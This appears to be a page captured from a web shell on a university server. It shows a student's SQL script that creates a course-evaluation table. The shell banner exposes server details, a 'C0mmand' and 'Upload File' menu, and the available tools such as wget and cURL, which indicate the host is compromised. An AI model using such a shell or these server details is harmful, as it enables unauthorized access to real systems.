Server IP : 172.16.15.8 / Your IP : 18.116.40.151 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/jawilson/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
/* File: evaluation.sql Author: Jacob Wilson Due Date: April 17th, 2022 Goal: the page to clear and create the EVALUATION table with three rows. */ drop table EVALUATION; create table EVALUATION (GENDER varchar(6), GRADE varchar(10), COUSER varchar(7), LECT_PART int, STU_PAR int, OVERALL int); insert into EVALUATION values ("Male", "Freshman", "CS212", 2, 3, 2); insert into EVALUATION values ("Female", "Junior", "CS310", 1, 2, 1); insert into EVALUATION values ("Male", "Junior", "CS310", 3, 3, 3); select * from EVALUATION;